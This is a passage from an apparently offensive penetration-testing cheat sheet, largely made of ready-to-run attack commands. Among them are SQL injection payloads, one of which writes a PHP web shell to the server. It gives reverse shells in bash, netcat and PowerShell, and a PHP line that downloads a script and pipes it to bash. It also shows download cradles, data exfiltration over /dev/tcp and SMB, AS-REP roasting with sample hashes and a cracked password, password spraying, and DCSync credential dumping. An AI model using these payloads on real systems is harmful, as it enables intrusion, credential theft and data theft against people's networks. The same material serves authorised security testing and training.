1.sqlite sqlite> .dump PRAGMA foreign_keys=OFF; BEGIN TRANSACTION; CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL); INSERT INTO users VALUES('emily','PASSWORD'); CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL); COMMIT; ``` Get tables and select from it: ``` sqlite> .tables sqlite> select * from accounts_customuser; ``` ### Windows OS Enumeration **[`^ back to top ^`](#overview)** #### Windows Basic Commands **[`^ back to top ^`](#overview)** ``` systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" ``` Users: ``` net users ``` Info about a user: ``` net user USER ``` Change USER PASSWORD: ``` net user USER NEW_PASSWORD ``` Add User: ``` net users USER /add ``` Adding a user into a group ``` net group Administrators USER /add net localgroup Administrators USER /add net group "Remote Desktop User" USER /add ``` Groups: ``` net groups net localgroups ``` Whoami: ``` whoami whoami /all ``` IP / Interfaces: ``` ipconfig /all ``` Routes: ``` route print ``` ARP table: ``` arp -A ``` List process: ``` tasklist ``` Query current drives on system: ``` fsutil fsinfo drives ``` List users that can use RDP ``` qwinsta ``` #### nbtstat **[`^ back to top ^`](#overview)** How to see the status of a server: ``` nbtstat -a nbtstat -a 10.10.1.100 ``` Whats is available there: ``` net view Target_IP net view 10.10.1.100 ``` Explore it: ``` net use < A_drive > \\Target_IP\SHARE_NAME net use K: \\10.10.1.100\Dados ``` #### winfo **[`^ back to top ^`](#overview)** NUll Session: ``` winfo < IP_Address > (-v verbose) (-n Null Session) ``` winfo – Enumarate: ``` winfo < IP_Address> -u ``` #### nbtscan **[`^ back to top ^`](#overview)** ``` nbtscan -r 172.16.1.0/24 ``` #### smblcient **[`^ back to top ^`](#overview)** NUll Session: ``` smbclient -L //172.168.1.5 -N ``` No Password but with User: ``` smbclient -L //172.168.1.5 -N -U Administrator smbclient //172.168.1.5/path -N smbclient //172.168.1.5/path -U DOMAIN\\administrator ``` #### rpcclient **[`^ back to top ^`](#overview)** ``` rpcclient -U "" -N 172.16.1.5 rpcclient -u "Administrator" -N 17.16.1.5 ``` Commands: * `enumdomusers` * `netshareenum` * `netshareenumall` * `querydominfo` * `lookupname root` * `queryuser john` Connect to an RPC share without a username and password and enumerate privileges: ``` rpcclient --user="" --command=enumprivs -N 172.20.10.5 ``` Connect to an RPC share with a username and enumerate privileges: ``` rpcclient --user="" --command=enumprivs 172.20.10.5 ``` #### enum4linux **[`^ back to top ^`](#overview)** All info: ``` enum4linux -a 172.16.1.5 ``` With user and blank pass: ``` enum4linux -a -u administrator -p "" 172.16.1.5 ``` ## 3. Vulnerability Assesment/Exploiting **[`^ back to top ^`](#overview)** ### 3.1 Useful Websites **[`^ back to top ^`](#overview)** * [cvedetails.com](https://www.cvedetails.com) – CVE security vulnerability database. * [exploit-db.com](https://www.exploit-db.com) – archive of public exploits. * [rapid7.com/db/](https://www.rapid7.com/db/) – Rapid7 vulnerability & exploit database. * [sploitus.com](https://sploitus.com/) – exploit and hacker tool search engine. * [sploitify.haxx.it](https://sploitify.haxx.it/) – exploit index. * [cxsecurity.com](https://cxsecurity.com/wlb) – bugtraq and exploit database. * [hakluke/weaponised-XSS-payloads](https://github.com/hakluke/weaponised-XSS-payloads) – collection of weaponized XSS payloads. * [namecheap.com](https://www.namecheap.com) – buy domains for cheap. * [streaak/keyhacks](https://github.com/streaak/keyhacks) – validate API keys. * [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) – list of useful payloads and bypasses. * [jwt.io](https://jwt.io) – decode, verify, and generate JWTs. * [portswigger.net/web-security](https://portswigger.net/web-security) – Web Security Academy learning materials. * [ired.team](https://www.ired.team/) – notes on Red Teaming and Weaponization. * [bigiamchallenge.com](https://bigiamchallenge.com) – nice AWS CTF. * [f-secure.com/text-message-checker](https://www.f-secure.com/en/text-message-checker) – SMS phishing checker. * [f-secure.com/online-shopping-checker](https://www.f-secure.com/en/online-shopping-checker) – online shopping scam checker. * [browserling.com](https://www.browserling.com/) – cross-browser testing sandbox. * [extsentry.github.io](https://extsentry.github.io/) – Chrome extension vulnerability assessment. * [useragentstring.com](https://www.useragentstring.com/) – detailed User-Agent parsing. ### Collaborator Servers **[`^ back to top ^`](#overview)** Used when trying to exploit an open redirect, blind cross-site scripting (XSS), DNS and HTTP interactions, etc. * [interactsh.com](https://app.interactsh.com) * [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator) * [canarytokens.org](https://canarytokens.org/generate) * [webhook.site](https://webhook.site) ### Subdomain Takeover **[`^ back to top ^`](#overview)** Biggest cloud service providers: * [aws.amazon.com](https://aws.amazon.com) * [azure.microsoft.com](https://azure.microsoft.com) * [cloud.google.com](https://cloud.google.com) * [wordpress.com](https://wordpress.com) * [shopify.com](https://www.shopify.com) ### Search Exploits and Scanners **[`^ back to top ^`](#overview)** ``` apt install docker.io docker run -d -p 443:443 --name openvas mikesplain/openvas ``` This command will both pull the docker container and then run the container. It may take a few minutes for the container to fully set up and begin running. Once it is complete you can then navigate to `https://127.0.0.1` in your preferred browser and OpenVAS will be setup and ready to go! Below are the default credentials to access OpenVAS/GVM: ``` Username: admin Password: admin ``` Search exploit for service: ``` searchsploit squirrelmail 1.4 ``` ### Subzy **[`^ back to top ^`](#overview)** Installation: ``` go install -v [github.com/lukasikic/subzy@latest](https://github.com/lukasikic/subzy@latest) ``` Check for subdomains takeover: ``` subzy -concurrency 100 -timeout 3 -targets subdomains_errors.txt | tee subzy_results.txt ``` ### subjack **[`^ back to top ^`](#overview)** Installation: ``` go install -v [github.com/haccer/subjack@latest](https://github.com/haccer/subjack@latest) ``` Check for subdomains takeover: ``` subjack -v -o subjack_results.json -t 100 -timeout 3 -a -m -w subdomains_errors.txt ``` ### Nikto **[`^ back to top ^`](#overview)** Scan a web server: ``` nikto -output nikto_results.txt -h somesite.com -p 80 ``` ### WPScan **[`^ back to top ^`](#overview)** Scan a WordPress website: ``` wpscan -o wpscan_results.txt --url somesite.com ``` ### Joomla **[`^ back to top ^`](#overview)** ``` joomscan --url http:// ``` ### Nuclei **[`^ back to top ^`](#overview)** Installation and updating: ``` go install -v [github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest](https://github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest) nuclei -up && nuclei -ut ``` Vulnerability scan, all templates: ``` nuclei -c 500 -o nuclei_results.txt -l subdomains_live_long_2xx_4xx.txt cat nuclei_results.txt | grep -Po '(?<=\ ).+' | sort -uf > nuclei_sorted_results.txt ``` Only subdomain takeover: ``` nuclei -c 500 -t takeovers -o nuclei_takeover_results.txt -l subdomains_live.txt ``` ### Arjun **[`^ back to top ^`](#overview)** Discover request parameters: ``` arjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -u [https://somesite.com](https://somesite.com) arjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -i subdomains_live_long_2xx.txt ``` ### Insecure Direct Object Reference (IDOR) **[`^ back to top ^`](#overview)** First, try to simply change one value to another, e.g., change `victim@gmail.com` to `hacker@gmail.com`, change some ID from `1` to `2`, etc. It is likely that lower number IDs will relate to some higher privilege accounts or roles. Second, try parameter pollution: ``` "email":"hacker@gmail.com,victim@gmail.com" "email":"hacker@gmail.com victim@gmail.com" "email":"hacker@gmail.com","email":"victim@gmail.com" "email":"victim@gmail.com,hacker@gmail.com" "email":"victim@gmail.com hacker@gmail.com" "email":"victim@gmail.com","email":"hacker@gmail.com" "email":("hacker@gmail.com","victim@gmail.com") "email":["hacker@gmail.com","victim@gmail.com"] "email":{"hacker@gmail.com","victim@gmail.com"} "email":("victim@gmail.com","hacker@gmail.com") "email":["victim@gmail.com","hacker@gmail.com"] "email":{"victim@gmail.com","hacker@gmail.com"} email=hacker%40gmail.com,victim%40gmail.com email=hacker%40gmail.com%20victim%40gmail.com email=hacker%40gmail.com&email=victim%40gmail.com email[]=hacker%40gmail.com&email[]=victim%40gmail.com email=victim%40gmail.com,hacker%40gmail.com email=victim%40gmail.com%20hacker%40gmail.com email=victim%40gmail.com&email=hacker%40gmail.com email[]=victim%40gmail.com&email[]=hacker%40gmail.com ``` To generate the above output, run [param_pollution.py](./scripts/param_pollution.py): ``` python3 param_pollution.py -n email -i victim@gmail.com -t hacker@gmail.com ``` ### HTTP Response Splitting **[`^ back to top ^`](#overview)** Also known as CRLF injection. CRLF refers to carriage return (`ASCII 13`, `\r`) and line feed (`ASCII 10`, `\n`). When encoded, `\r` refers to `%0D` and `\n` refers to `%0A`. Fixate a session cookie: ``` somesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789 ``` Open redirect: ``` somesite.com/home.php?marketing=winter%0D%0ALocation:%20https%3A%2F%2Fgithub.com ``` Session fixation and open redirection are one of many techniques used in combination with HTTP response splitting. Search the Internet for more techniques. ### Cross-Site Scripting (XSS) **[`^ back to top ^`](#overview)** Simple cross-site scripting (XSS) payloads: ``` ``` Hosting JavaScript on [Pastebin](https://pastebin.com) won't work because Pastebin always returns `text/plain` content type. Find out more about reflected and stored cross-site scripting (XSS) attacks, as well as cross-site request forgery (XSRF/CSRF) attacks in project at [ivan-sincek/xss-catcher](https://github.com/ivan-sincek/xss-catcher). Valid RFC emails with embedded XSS: ``` user+()@somedomain.com user@somedomain().com ""@somedomain.com ``` ### SQL Injection **[`^ back to top ^`](#overview)** Boolean-based SQLi: ``` ' OR 1=1-- ' OR 1=2-- ``` Union-based SQLi: ``` ' UNION SELECT 1,2,3,4-- ' UNION SELECT NULL,NULL,NULL,NULL-- ' UNION SELECT 1,concat_ws('|',database(),current_user(),version()),3,4-- ' UNION SELECT 1,concat_ws('|',table_schema,table_name,column_name,data_type,character_maximum_length),3,4 FROM information_schema.columns-- ' UNION SELECT 1,load_file('..\\..\\apache\\conf\\httpd.conf'),3,4-- ``` If using, e.g `1,2,3,4` does not work, try using `NULL,NULL,NULL,NULL` respectively. Use the union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather results. The goal is to determine the exact number of columns in the SQL query and to figure out which of them are shown back to the user. Another way to determine the exact number of columns is by using, e.g., `' ORDER BY 1-- `, where `1` is the column number used for sorting – incrementing it by one on each try. Time-based SQLi: ``` ' AND (SELECT 1 FROM (SELECT sleep(2)) test)-- ' AND (SELECT 1 FROM (SELECT CASE user() WHEN 'root@127.0.0.1' THEN sleep(2) ELSE sleep(0) END) test)-- ' AND (SELECT 1 FROM (SELECT CASE substring(current_user(),1,1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)-- ' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM users WHERE id = 1)-- ' AND IF(version() LIKE '5%',sleep(2),sleep(0))-- ``` Use the time-based SQLi when you are not able to see the results. Check for the existance/correctness: ``` ' AND (SELECT 'exists' FROM users) = 'exists ' AND (SELECT 'exists' FROM users WHERE username = 'administrator') = 'exists ' AND (SELECT 'correct' FROM users WHERE username = 'administrator' AND length(password) < 8 ) = 'correct ' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE 'correct' END FROM users WHERE username = 'administrator') = 'correct '||(SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE '' END FROM users WHERE username = 'administrator')||' ``` Inject a [simple PHP web shell](https://github.com/kraloveckey/ghostpack-binaries/blob/main/php-reverse-shell/src/web/simple_php_web_shell_get.php) based on HTTP GET request: ``` ' UNION SELECT '', '', '', '' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- ' UNION SELECT '', '', '', '0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o="ERROR: The function might be disabled.";}else{$o=str_replace("<","<",$o);$o=str_replace(">",">",$o);}} ?>

' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- ``` ### sqlmap **[`^ back to top ^`](#overview)** Inject SQL code into request parameters: ``` sqlmap -a -u [somesite.com/index.php?username=test&password=test](https://somesite.com/index.php?username=test&password=test) sqlmap -a -u [somesite.com/index.php](https://somesite.com/index.php) --data username=test&password=test sqlmap -a -u [somesite.com/index.php](https://somesite.com/index.php) --data username=test&password=test -p password ``` Check the site for SQL injection via the `list[fullordering]` parameter using the most aggressive settings, and if a vulnerability is found, extract the list of databases: ``` sqlmap -u "http:///index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ``` Check SQL Injection in `nagions`: ``` sqlmap -u "https:////nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=1ec86e6d63a7db533923217f3db57a35a244e800" --level 5 --risk 3 -p id Pull nagios the database: ```shell sqlmap -u "https:////nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https:///nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --dump ``` | Option | Description | | --- | --- | | -u | Target URL | | -H | Extra HTTP header | | --data | Data string to be sent through POST | | --cookie | HTTP Cookie header value | | --proxy | Use a proxy to connect to the target URL (protocol://host:port) | | -p | Testable parameter(s) | | --level | Level of tests to perform (1-5, default: 1) | | --risk | Risk of tests to perform (1-3, default: 1) | | -a | Retrieve everything | | -b | Retrieve DBMS banner | | --dump-all | Dump all DBMS databases tables entries | | --os-shell | Prompt for an interactive operating system shell | | --os-pwn | Prompt for an OOB shell, Meterpreter, or VNC | | --sqlmap-shell | Prompt for an interactive sqlmap shell | | --wizard | Simple wizard interface for beginner users | | --dbms | To do. | ### dotdotpwn **[`^ back to top ^`](#overview)** Traverse a path (e.g., `somesite.com/../../../etc/passwd`): ``` dotdotpwn -q -m http -S -o windows -f /windows/win.ini -k mci -h somesite.com dotdotpwn -q -m http -o unix -f /etc/passwd -k root -h somesite.com dotdotpwn -q -m http-url -o unix -f /etc/hosts -k localhost -u '[https://somesite.com/index.php?file=TRAVERSAL](https://somesite.com/index.php?file=TRAVERSAL)' ``` Try to prepend a protocol such as `file://`, `gopher://`, `dict://`, `php://`, `jar://`, `ftp://`, `tftp://`, etc., to the file path; e.g, `file://TRAVERSAL`. Check some additional directory traversal tips at [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings). Credits to the author! | Option | Description | | --- | --- | | -m | Module (http, http-url, ftp, tftp payload, stdout) | | -h | Hostname | | -O | Operating System detection for intelligent fuzzing (nmap) | | -o | Operating System type if known ("windows", "unix", or "generic") | | -d | Depth of traversals (default: 6) | | -f | Specific filename (default: according to OS detected) | | -S | Use SSL for HTTP and Payload module (not needed for http-url) | | -u | URL with the part to be fuzzed marked as TRAVERSAL | | -k | Text pattern to match in the response | | -p | Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword | | -x | Port to connect (default: HTTP=80; FTP=21; TFTP=69) | | -U | Username (default: 'anonymous') | | -P | Password (default: 'dot(at)dot.pwn') | | -M | HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET) | | -b | Break after the first vulnerability is found | | -C | Continue if no data was received from host | ### Web Shells **[`^ back to top ^`](#overview)** Find out more about PHP shells in project at [ghostpack-binaries/php-reverse-shell](https://github.com/ghostpack-binaries/php-reverse-shell). Find out more about Java/JSP shells in project at [ivan-sincek/java-reverse-tcp](https://github.com/ivan-sincek/java-reverse-tcp). ### Send a Payload With Python **[`^ back to top ^`](#overview)** Find out how to generate a reverse shell payload for Python and send it to the target machine in project at [ivan-sincek/send-tcp-payload](https://github.com/ivan-sincek/send-tcp-payload). ### SMTP Enum Users: ``` nc -vn target 25 VRFY User_to_test VRFY root answer = 252 2.0.0 root means That this user Exist here. VRFY bla answer = 550 5.1.1 means that bla doesn't exist here. ``` Reading emails using telnet: ``` telnet Ip_target port ``` ``` $ telnet 172.20.10.2 110 USER username PASS password list retr 1 ``` ## 4. Post Exploitation **[`^ back to top ^`](#overview)** ### 4.1 Useful Websites **[`^ back to top ^`](#overview)** * [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) * [lolbas-project.github.io](https://lolbas-project.github.io) * [gtfobins.org](https://gtfobins.org) * [ghostpack-binaries](https://github.com/ghostpack-binaries) ### Generate a Reverse Shell Payload **[`^ back to top ^`](#overview)** Use [calebstewart/pwncat](https://github.com/calebstewart/pwncat): ``` pip install pwncat-cs Listener: pwncat-cs 192.168.1.1 4444 (To change from pwncat shell to local shell, use Ctrl+D) ``` Also use [`Reverse Shell Generator`](https://www.revshells.com/) or options below. ``` bash -c "bash -i >& /dev/tcp//4444 0<&1" ``` ``` /bin/bash -c 'exec bash -i &>/dev/tcp//4444 <&1' ``` ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 4444 >/tmp/f ``` Create Linux payload: ``` echo "bash -c 'bash -i >& /dev/tcp//4444 0<&1'" | base64 echo "bash -c 'bash -i >& /dev/tcp//4444 0>&1'" > shell.sh ``` Create powershell payload: ``` echo -n '$client = New-Object System.Net.Sockets.TCPClient("REMOTE_IP",REMOTE_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF8 -t UTF16LE | base64 ``` Execute it: ``` ?cmd=powershell -e payload ``` Create PHP payload: ``` @php system("curl http://:8081/rev.sh|bash"); @endphp ``` Or use [`MSFVenom Payloads`](https://www.revshells.com/). #### Generate a Reverse Shell Payload via MSFVenom **[`^ back to top ^`](#overview)** Find out how to generate a reverse shell payload for Windows OS, Linux OS, PHP, Java and send it to the target machine in project at [MSFVenom Payloads](https://www.revshells.com/). ### PowerShell Encoded Command **[`^ back to top ^`](#overview)** To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command: ``` [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script))) ``` To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt: ``` PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command ``` To decode a PowerShell encoded command, run the following PowerShell command: ``` [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command)) ``` Find out more about PowerShell reverse and bind TCP shells in project at [ivan-sincek/powershell-reverse-tcp](https://github.com/ivan-sincek/powershell-reverse-tcp). ### Basics #### Stabilizing Linux Shell **[`^ back to top ^`](#overview)** ``` script /dev/null -c bash CTRL+Z stty raw -echo; fg reset screen ``` #### Port Forwarding **[`^ back to top ^`](#overview)** ##### SSH Port Forwarding Proxy `8080` port from remote machine `` to `localhost`: ``` ssh -L 8080:localhost:8080 username@ ``` Proxy `80` port from remote machine `10.10.10.10` to `localhost`: ``` ssh -N -L 80:localhost:80 username@10.10.10.10 -C ``` ##### sshuttle **[`^ back to top ^`](#overview)** Creating VPN tunnel through ssh to any subnet: ``` sshuttle -e "ssh <-i id_rsa_priv.key>" -r user@tunnel_ip & sshuttle -e "ssh -i bob.key" -r bob@10.0.1.1 192.168.1.0/24 192.168.25.0/24 & ``` ##### chisel **[`^ back to top ^`](#overview)** ``` ./chisel server -p 8000 --reverse #Server -- Attacker ./chisel client 10.10.16.3:8000 R:100:172.17.0.1:100 #Client -- Victim ``` For example, there is port 8083. Proxy it to see what it does. Choose chisel, which has a more stable speed. ``` $ wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz $ gzip -d chisel_1.9.1_windows_amd64.gz $ mv chisel_1.9.1_windows_amd64 chisel.exe $ chisel server --port 1133 --reverse 2024/02/21 13:24:22 server: Reverse tunnelling enabled 2024/02/21 13:24:22 server: Fingerprint c/HoJKuWS5e8QfRNRVjGpXQE5Nw5gSXLEFbzFried5M= 2024/02/21 13:24:22 server: Listening on http://0.0.0.0:1133 meterpreter > upload chisel.exe meterpreter > shell Process 5604 created. Channel 3 created. Microsoft Windows [Version 10.0.20348.2322] (c) Microsoft Corporation. All rights reserved. C:\Users\tstark>.\chisel.exe client REMOTE_IP:1133 R:8083:127.0.0.1:8083 .\chisel.exe client REMOTE_IP:1133 R:8083:127.0.0.1:8083 2024/02/21 09:08:16 client: Connecting to ws://REMOTE_IP:1133 2024/02/21 09:08:18 client: Connected (Latency 156.9429ms) ``` For Linux: ``` ./chisel client REMOTE_IP:1133 R:8083:127.0.0.1:8083 ``` The proxy came out successfully, then open it and take a look: `http://127.0.0.1:8083/`. ##### socat **[`^ back to top ^`](#overview)** On victim: ``` socat tcp-listen:8080,reuseaddr,fork tcp:localhost:9200 & ``` ##### Netcat Portfwd **[`^ back to top ^`](#overview)** On victim: ``` nc -nlvp 8080 -c "nc localhost 1234" ``` ##### Meterpreter Portfwd **[`^ back to top ^`](#overview)** Proxy port from remote machine to local via `Meterpreter` session: ``` (Meterpreter 2)(C:\Windows\system32) > portfwd add -l 9200 -p 9200 -r 127.0.0.1 [*] Forward TCP relay created: (local) :9200 -> (remote) 127.0.0.1:9200 ``` #### Transfering Files Windows **[`^ back to top ^`](#overview)** cmd: ``` iwr -uri "http://10.10.10.10:8080/shell.exe" -outfile "shell.exe" wget -O shell.exe 10.10.10.10:8000/shell.exe certutil -urlcache -f http://10.10.10.10:8000/shell.exe C:\inetpub\shell.exe ``` Powershell: ``` Invoke-WebRequest http://10.10.10.10:8000/shell.exe -OutFile shell.exe powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:8000/shell.exe', 'shell.exe')" powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:8000/something.ps1')" ``` via SMB: ``` # On attacker python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . # On target copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe ``` #### Transfering Files Linux **[`^ back to top ^`](#overview)** ``` wget http://10.10.10.10:8000/some.sh curl -o some.sh http://10.10.10.10:8000/some.sh ``` via base64: ``` cat shell.sh | base64 -w 0 # On attacker echo | base64 -d > shell.sh # On target ``` via scp: ``` scp some.sh user@10.10.10.10:/tmp/some.sh # On attacker ``` ### Exfiltrating Data **[`^ back to top ^`](#overview)** #### Linux Exfiltrating Data **[`^ back to top ^`](#overview)** On kali: ``` nc -nlvp 80 > datafolder.tmp ``` On target: ``` tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/10.10.10.10/80 ``` On kali: ``` dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar tar xf datafolder.tar ``` #### SSH Exfiltrating Data **[`^ back to top ^`](#overview)** On target: ``` tar zcf - /tmp/datafolder | ssh root@ "cd /tmp; tar zxpf -" ``` On kali: ``` cd /tmp/datafolder ``` #### Windows Exfiltrating Data **[`^ back to top ^`](#overview)** Via SMB server: ``` python3 /usr/share/doc/python3-impacket/examples/smbserver.py -username user -password pass share . -smb2support # On kali net use \\10.10.16.5\share /u:user pass # On victim copy C:\Users\user\Desktop\somefile.txt \\10.10.16.5\share\somefile.txt # On victim ``` Via `pscp`: ``` pscp Administrator@10.10.10.10:/Users/Administrator/Downloads/something.txt ``` ### Active Directory and Windows Lateral Movement **[`^ back to top ^`](#overview)** #### ASREPRoast **[`^ back to top ^`](#overview)** `AS-REP Roasting` to get user hashes: ``` $ impacket-GetNPUsers / -usersfile users.txt -outputfile outputusers.txt -dc-ip -no-pass $ cat outputusers.txt $krb5asrep$23$jmontgomery@:7d8cc128c583c382aef2a6fa2d4ec321$cb396eb66b794e5e909d71ffa4cd6685dde517e4b96e493c8e659f0e3ba3115fa7efea11ec14040a382676bd5c37911354af87397d9bd91882c7127304c2194fba95c7f83e15473ace5ec5769f7711d54f91c51b75510b725348e8b78761874a4e54057056c599d94a491a6c9c347221e7215bb99cc528bbeb530293866662b9c23a13981ce41dc105f1a1d331ad818f547cb21fe3e24bc27ba18558cd002a258603b56709bf9670fff20af3bc0a1e8bbde3106439fb27427ddebe4a91cfa09cdfa8642a230f9cd6ea06d331b5d91435235bafaeaeb5200c75b110643f58cb53a0c4 $krb5asrep$23$lbradford@:1ed6777b1a90024c90cb66b7d3fc3578$8eef92a40e9c405e101e8383169fa8db91202010db8d64a242ab0ec9914d0a17f394b519b3ef8bb138faaba0fb85b91521d0629af96b66eae6e50eed31a9629753ca7f875b803a8546cd368010f40f11a2937576d4129380ec9edfafc18b3e2f2414a08747ba6d3e963a3dfa100dc48d1fb2cec6132343e9bc4bba7aed44ee7e259f24eda2e69ccd93a754133fd133028598f72c6c6d04fc0b9c029e1504454cbc6c2d5cb22f4549810b9b5694d23f6a8726ccbebdb07820bda7ff181dc16c65bdfb375c971833562f6c4efc44fd6a338ad0c2f9d9a30eabc6809ab8a5ef7b9f0a85 $krb5asrep$23$mlowe@:8d268a1ce5040c77262d6fb3e00dd850$4ccd13bd24c517bcc0d6a8aee6030dcec36cdf7ef347b5bace1633fde2438bf675fc57451df849641b5ac4ee13eb603b3a4aa48bff9aee0c7803d9173b3f55289f6ff9cd26a26b9b568e4c72e4c1f78368b9ad28fe0c5a4992c6ac8f347414f19474366bbfe8ae5260e205b08c589d2dbc7adb7ebbc3827cd0071f3e78bf4167c310a4a2514ac044d0540b5d9ba546b19d4f34062f68df5935b9af9f5cff893ceba13c34d452f23249a56e0cc39adc239fad13e6775c8d10541e0ed59594971e7b0f0e792c0b982cd00d4c90fb9aea9d1e44e6ad81a8fa38b2b370b00f241040a106 ``` Get three hashes. Use [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes): ``` $ hashcat -m 18200 outputusers.txt /usr/share/wordlists/rockyou.txt $krb5asrep$23$jmontgomery@:7d8cc128c583c382aef2a6fa2d4ec321$cb396eb66b794e5e909d71ffa4cd6685dde517e4b96e493c8e659f0e3ba3115fa7efea11ec14040a382676bd5c37911354af87397d9bd91882c7127304c2194fba95c7f83e15473ace5ec5769f7711d54f91c51b75510b725348e8b78761874a4e54057056c599d94a491a6c9c347221e7215bb99cc528bbeb530293866662b9c23a13981ce41dc105f1a1d331ad818f547cb21fe3e24bc27ba18558cd002a258603b56709bf9670fff20af3bc0a1e8bbde3106439fb27427ddebe4a91cfa09cdfa8642a230f9cd6ea06d331b5d91435235bafaeaeb5200c75b110643f58cb53a0c4:Midnight_121 ``` #### bloodyAD **[`^ back to top ^`](#overview)** Add the USERNAME to the `ServiceMgmt` group, using bloody: ``` bloodyAD -u AUTH_USERNAME -p 'PASSWORD' -d --host IP add groupMember SERVICEMGMT USERNAME [+] USERNAME added to SERVICEMGMT ``` Give USERNAME `GenericAll` permissions on the OU and then change the `winrm_svc` user's password to a different. #### Bloodhound **[`^ back to top ^`](#overview)** Bloodhound using for get useful information about domain: ``` ntpdate -s dc01. bloodhound-python -u USERNAME -p 'PASSWORD' -ns IP -d -c All ``` #### CrackMapExec **[`^ back to top ^`](#overview)** ``` apt install -y libssl-dev libffi-dev python-dev build-essential git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec cd CrackMapExec poetry install cp /root/.cme/workspaces/default/smb.db ~/cme_smb.bak rm -f /root/.cme/workspaces/default/smb.db poetry run crackmapexec smb -u guest -p '' --shares --rid-brute 10000 poetry run crackmapexec smb -u anonymous -p "" --rid-brute poetry run crackmapexec smb -u users.txt -p passwords.txt ``` Using the Password spraying, you can find all users also has this password: ``` poetry run crackmapexec smb -u users.txt -p 'PASSWORD' --continue-on-success ``` Use the username dictionary you have obtained to try `ASREPRoast`: ``` poetry run crackmapexec ldap -u users.txt -p '' --asreproast output.txt ``` #### DCSync **[`^ back to top ^`](#overview)** There is a technique that allows to bypass (`The Account is sensitive and cannot be delegated`) it with RBCD (`Resource-based Constrained Delegation`): ``` ntpdate -s dc01. getTGT.py -dc-ip "dc01." /'delegator$' -hashes ':8689904d05752e977a546e201d09e724' export KRB5CCNAME=delegator\$.ccache ntpdate -s dc01. rbcd.py '/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass -dc-ip -debug ntpdate -s dc01. getTGT.py -dc-ip "dc01." ""/'ldap_monitor':'PASSWORD' export KRB5CCNAME=ldap_monitor.ccache ntpdate -s dc01. getST.py -spn "browser/dc01." -impersonate "dc01$" "/ldap_monitor" -k -no-pass export KRB5CCNAME=./delegator\$@dc01..ccache ntpdate -s dc01. getST.py -spn 'http/dc01.' -impersonate 'dc01$' -additional-ticket 'dc01$.ccache' '/delegator$' -k -no-pass export KRB5CCNAME=dc01\$.ccache ntpdate -s dc01. secretsdump.py -no-pass -k dc01. -just-dc-ntlm ``` DCSync is a technique that impersonates a DC by simulating a replication process. secretsdump.py tool is used to carry out this type of attack. It sends an `IDL_DRSGetNCChanges` request to the `DRSUAPI` to replicate LDAP directory objects in a given naming context (NC), in order to retrieve Kerberos keys and the secrets contained in the `NTDS.DIT` database. We can now retrieve the NT hashes of all domain accounts, as we have `dcsync` rights (`DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`): ``` secretsdump.py -no-pass -k dc01. -just-dc-ntlm ``` #### dcom-exec **[`^ back to top ^`](#overview)** ``` $ runas /user:\svc_openfire /netonly powershell ``` Then: ``` $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.X.X")) # or 